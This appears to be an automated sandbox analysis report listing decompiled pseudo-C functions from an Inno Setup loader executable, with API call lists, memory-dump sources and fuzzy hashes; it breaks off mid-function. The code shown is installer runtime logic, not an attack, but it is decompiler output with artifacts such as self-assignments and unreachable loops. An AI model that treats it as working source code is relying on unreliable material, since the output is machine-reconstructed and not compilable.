                                                            • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                            • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF91C(void* __eax) {
                                                            				char _v44;
                                                            				struct _SYSTEM_INFO _v80;
                                                            				long _v84;
                                                            				char _v88;
                                                            				long _t22;
                                                            				int _t28;
                                                            				void* _t37;
                                                            				struct _MEMORY_BASIC_INFORMATION* _t40;
                                                            				long _t41;
                                                            				void** _t42;
                                                            
                                                            				_t42 =  &(_v80.dwPageSize);
                                                            				 *_t42 = __eax;
                                                            				_t40 =  &_v44;
                                                            				GetSystemInfo( &_v80); // executed
                                                            				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
                                                            				if(_t22 == 0) {
                                                            					L17:
                                                            					return _t22;
                                                            				} else {
                                                            					while(1) {
                                                            						_t22 = _t40->AllocationBase;
                                                            						if(_t22 !=  *_t42) {
                                                            							goto L17;
                                                            						}
                                                            						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
                                                            							L15:
                                                            							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
                                                            							if(_t22 == 0) {
                                                            								goto L17;
                                                            							}
                                                            							continue;
                                                            						} else {
                                                            							_v88 = 0;
                                                            							_t41 = _t40->Protect;
                                                            							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
                                                            								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
                                                            								if(_t28 != 0) {
                                                            									_v88 = 1;
                                                            								}
                                                            							}
                                                            							_t37 = 0;
                                                            							while(_t37 < _t40->RegionSize) {
                                                            								E004AF914(_t40->BaseAddress + _t37);
                                                            								_t37 = _t37 + _v80.dwPageSize;
                                                            							}
                                                            							if(_v88 != 0) {
                                                            								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
                                                            							}
                                                            							goto L15;
                                                            						}
                                                            					}
                                                            					goto L17;
                                                            				}
                                                            			}














                                                            APIs
                                                            • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                            • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                            • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                            • String ID:
                                                            • API String ID: 2441996862-0
                                                            • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                            • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                            • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00407750() {
                                                            				void* _t20;
                                                            				void* _t23;
                                                            				intOrPtr _t31;
                                                            				intOrPtr* _t33;
                                                            				void* _t46;
                                                            				struct HINSTANCE__* _t49;
                                                            				void* _t56;
                                                            
                                                            				if( *0x4b7004 != 0) {
                                                            					E00407630();
                                                            					E004076B8(_t46);
                                                            					 *0x4b7004 = 0;
                                                            				}
                                                            				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                            					E00407388(0x4bdbc8);
                                                            					E0040768C(0x4bdbc8);
                                                            				}
                                                            				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                            					L8:
                                                            					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                            						 *0x004BDBA4 = 0;
                                                            					}
                                                            					if( *((char*)(0x4bdbc0)) != 0) {
                                                            						L14:
                                                            						E004073B0();
                                                            						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                            							_t15 =  *0x004BDBA8;
                                                            							if( *0x004BDBA8 != 0) {
                                                            								E0040B40C(_t15);
                                                            								_t31 =  *((intOrPtr*)(0x4bdba8));
                                                            								_t8 = _t31 + 0x10; // 0x400000
                                                            								_t49 =  *_t8;
                                                            								_t9 = _t31 + 4; // 0x400000
                                                            								if(_t49 !=  *_t9 && _t49 != 0) {
                                                            									FreeLibrary(_t49);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00407388(0x4bdb98);
                                                            						if( *((char*)(0x4bdbc0)) == 1) {
                                                            							 *0x004BDBBC();
                                                            						}
                                                            						if( *((char*)(0x4bdbc0)) != 0) {
                                                            							E0040768C(0x4bdb98);
                                                            						}
                                                            						if( *0x4bdb98 == 0) {
                                                            							if( *0x4bb038 != 0) {
                                                            								 *0x4bb038();
                                                            							}
                                                            							ExitProcess( *0x4b7000); // executed
                                                            						}
                                                            						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                            						_t56 = _t56 + 0xc;
                                                            						0x4b7000 = 0x4b7000;
                                                            						0x4bdb98 = 0x4bdb98;
                                                            						goto L8;
                                                            					} else {
                                                            						_t20 = E004054B4();
                                                            						_t44 = _t20;
                                                            						if(_t20 == 0) {
                                                            							goto L14;
                                                            						} else {
                                                            							goto L13;
                                                            						}
                                                            						do {
                                                            							L13:
                                                            							E00405CE8(_t44);
                                                            							_t23 = E004054B4();
                                                            							_t44 = _t23;
                                                            						} while (_t23 != 0);
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t33 =  *0x4bb054; // 0x0
                                                            						 *0x4bb054 = 0;
                                                            						 *_t33();
                                                            					} while ( *0x4bb054 != 0);
                                                            					L8:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}











                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                            • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                            • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E00407748() {
                                                            				intOrPtr* _t14;
                                                            				void* _t23;
                                                            				void* _t26;
                                                            				intOrPtr _t34;
                                                            				intOrPtr* _t36;
                                                            				void* _t50;
                                                            				struct HINSTANCE__* _t53;
                                                            				void* _t62;
                                                            
                                                            				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                            				if( *0x4b7004 != 0) {
                                                            					E00407630();
                                                            					E004076B8(_t50);
                                                            					 *0x4b7004 = 0;
                                                            				}
                                                            				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                            					E00407388(0x4bdbc8);
                                                            					E0040768C(0x4bdbc8);
                                                            				}
                                                            				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                            					L9:
                                                            					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                            						 *0x004BDBA4 = 0;
                                                            					}
                                                            					if( *((char*)(0x4bdbc0)) != 0) {
                                                            						L15:
                                                            						E004073B0();
                                                            						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                            							_t18 =  *0x004BDBA8;
                                                            							if( *0x004BDBA8 != 0) {
                                                            								E0040B40C(_t18);
                                                            								_t34 =  *((intOrPtr*)(0x4bdba8));
                                                            								_t8 = _t34 + 0x10; // 0x400000
                                                            								_t53 =  *_t8;
                                                            								_t9 = _t34 + 4; // 0x400000
                                                            								if(_t53 !=  *_t9 && _t53 != 0) {
                                                            									FreeLibrary(_t53);
                                                            								}
                                                            							}
                                                            						}
                                                            						E00407388(0x4bdb98);
                                                            						if( *((char*)(0x4bdbc0)) == 1) {
                                                            							 *0x004BDBBC();
                                                            						}
                                                            						if( *((char*)(0x4bdbc0)) != 0) {
                                                            							E0040768C(0x4bdb98);
                                                            						}
                                                            						if( *0x4bdb98 == 0) {
                                                            							if( *0x4bb038 != 0) {
                                                            								 *0x4bb038();
                                                            							}
                                                            							ExitProcess( *0x4b7000); // executed
                                                            						}
                                                            						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                            						_t62 = _t62 + 0xc;
                                                            						0x4b7000 = 0x4b7000;
                                                            						0x4bdb98 = 0x4bdb98;
                                                            						goto L9;
                                                            					} else {
                                                            						_t23 = E004054B4();
                                                            						_t48 = _t23;
                                                            						if(_t23 == 0) {
                                                            							goto L15;
                                                            						} else {
                                                            							goto L14;
                                                            						}
                                                            						do {
                                                            							L14:
                                                            							E00405CE8(_t48);
                                                            							_t26 = E004054B4();
                                                            							_t48 = _t26;
                                                            						} while (_t26 != 0);
                                                            						goto L15;
                                                            					}
                                                            				} else {
                                                            					do {
                                                            						_t36 =  *0x4bb054; // 0x0
                                                            						 *0x4bb054 = 0;
                                                            						 *_t36();
                                                            					} while ( *0x4bb054 != 0);
                                                            					L9:
                                                            					while(1) {
                                                            					}
                                                            				}
                                                            			}












                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                            • String ID: MZP
                                                            • API String ID: 3490077880-2889622443
                                                            • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                            • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                            • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E004B5000(void* __ecx, void* __edx) {
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t22;
                                                            
                                                            				_push(_t22);
                                                            				_push(0x4b50d7);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t22;
                                                            				 *0x4bb98c =  *0x4bb98c - 1;
                                                            				if( *0x4bb98c < 0) {
                                                            					E00405B74();
                                                            					E004051A8();
                                                            					SetThreadLocale(0x400); // executed
                                                            					E0040A250();
                                                            					 *0x4b700c = 2;
                                                            					 *0x4bb01c = 0x4036b0;
                                                            					 *0x4bb020 = 0x4036b8;
                                                            					 *0x4bb05a = 2;
                                                            					 *0x4bb060 = E0040CAA4();
                                                            					 *0x4bb008 = 0x4095a0;
                                                            					E00405BCC(E00405BB0());
                                                            					 *0x4bb068 = 0xd7b0;
                                                            					 *0x4bb344 = 0xd7b0;
                                                            					 *0x4bb620 = 0xd7b0;
                                                            					 *0x4bb050 = GetCommandLineW();
                                                            					 *0x4bb04c = E00403810();
                                                            					 *0x4bb97c = GetACP();
                                                            					 *0x4bb980 = 0x4b0;
                                                            					 *0x4bb044 = GetCurrentThreadId();
                                                            					E0040CAB8();
                                                            				}
                                                            				_pop(_t19);
                                                            				 *[fs:eax] = _t19;
                                                            				_push(0x4b50de);
                                                            				return 0;
                                                            			}






                                                            APIs
                                                            • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                              • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                              • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                              • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                            • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                              • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                            • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                            • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                              • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                            • String ID:
                                                            • API String ID: 2740004594-0
                                                            • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                            • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                            • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char* _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				int _t30;
                                                            				intOrPtr _t63;
                                                            				void* _t71;
                                                            				void* _t73;
                                                            				intOrPtr _t75;
                                                            				intOrPtr _t76;
                                                            
                                                            				_t71 = __edi;
                                                            				_t54 = __ebx;
                                                            				_t75 = _t76;
                                                            				_t55 = 4;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t55 = _t55 - 1;
                                                            				} while (_t55 != 0);
                                                            				_push(_t55);
                                                            				_push(__ebx);
                                                            				_t73 = __eax;
                                                            				_t78 = 0;
                                                            				_push(_t75);
                                                            				_push(0x4af0e1);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t76;
                                                            				while(1) {
                                                            					E00422D70( &_v12, _t54, _t55, _t78); // executed
                                                            					_t55 = L".tmp";
                                                            					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
                                                            					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
                                                            					if(_t30 != 0) {
                                                            						break;
                                                            					}
                                                            					_t54 = GetLastError();
                                                            					_t78 = _t54 - 0xb7;
                                                            					if(_t54 != 0xb7) {
                                                            						E00426F08(0x3d,  &_v32, _v8);
                                                            						_v28 = _v32;
                                                            						E00419E18( &_v36, _t54, 0);
                                                            						_v24 = _v36;
                                                            						E004232EC(_t54,  &_v40);
                                                            						_v20 = _v40;
                                                            						E00426ED8(0x81, 2,  &_v28,  &_v16);
                                                            						_t55 = _v16;
                                                            						E0041F264(_v16, 1);
                                                            						E0040711C();
                                                            					}
                                                            				}
                                                            				E00407E00(_t73, _v8);
                                                            				__eflags = 0;
                                                            				_pop(_t63);
                                                            				 *[fs:eax] = _t63;
                                                            				_push(E004AF0E8);
                                                            				E00407A80( &_v40, 3);
                                                            				return E00407A80( &_v16, 3);
                                                            			}



















                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                            • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                            				WCHAR* _v8;
                                                            				void* _t13;
                                                            				struct HWND__* _t24;
                                                            				WCHAR* _t29;
                                                            				long _t32;
                                                            
                                                            				_v8 = _t29;
                                                            				_t32 = __eax;
                                                            				_t13 = E00405740();
                                                            				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                            				E00405730(_t13);
                                                            				return _t24;
                                                            			}









                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: InnoSetupLdrWindow$STATIC
                                                            • API String ID: 716092398-2209255943
                                                            • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                            • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
                                                            				intOrPtr _v8;
                                                            				long _t5;
                                                            				long _t9;
                                                            				void* _t10;
                                                            				void* _t13;
                                                            				void* _t15;
                                                            				void* _t16;
                                                            
                                                            				_t5 = __eax;
                                                            				_v8 = __edx;
                                                            				_t9 = __eax;
                                                            				_t15 = _t10 - 1;
                                                            				if(_t15 < 0) {
                                                            					L10:
                                                            					return _t5;
                                                            				}
                                                            				_t16 = _t15 + 1;
                                                            				_t13 = 0;
                                                            				while(1) {
                                                            					_t19 = _t13 - 1;
                                                            					if(_t13 != 1) {
                                                            						__eflags = _t13 - 1;
                                                            						if(__eflags > 0) {
                                                            							Sleep(_a4);
                                                            						}
                                                            					} else {
                                                            						Sleep(_a8);
                                                            					}
                                                            					_t5 = E00427154(_t9, _v8, _t19); // executed
                                                            					if(_t5 != 0) {
                                                            						goto L10;
                                                            					}
                                                            					_t5 = GetLastError();
                                                            					if(_t5 == 2) {
                                                            						goto L10;
                                                            					}
                                                            					_t5 = GetLastError();
                                                            					if(_t5 == 3) {
                                                            						goto L10;
                                                            					}
                                                            					_t13 = _t13 + 1;
                                                            					_t16 = _t16 - 1;
                                                            					if(_t16 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L10;
                                                            				}
                                                            				goto L10;
                                                            			}











                                                            APIs
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                            • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
                                                            				char _v8;
                                                            				char _v9;
                                                            				int _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				int _t33;
                                                            				int _t43;
                                                            				int _t64;
                                                            				intOrPtr _t72;
                                                            				intOrPtr _t74;
                                                            				signed int* _t77;
                                                            				signed int* _t79;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            
                                                            				_t81 = _t82;
                                                            				_t83 = _t82 + 0xffffffe8;
                                                            				_v8 = 0;
                                                            				_t77 = __ecx;
                                                            				_t79 = __edx;
                                                            				_push(_t81);
                                                            				_push(0x420094);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t83;
                                                            				_v9 = 0;
                                                            				E00407E48( &_v8, __eax);
                                                            				E00407FB0( &_v8);
                                                            				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
                                                            				_t64 = _t33;
                                                            				if(_t64 == 0) {
                                                            					_pop(_t72);
                                                            					 *[fs:eax] = _t72;
                                                            					_push(0x42009b);
                                                            					return E00407A20( &_v8);
                                                            				} else {
                                                            					_v20 = E004053F0(_t64);
                                                            					_push(_t81);
                                                            					_push(0x420077);
                                                            					_push( *[fs:edx]);
                                                            					 *[fs:edx] = _t83;
                                                            					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
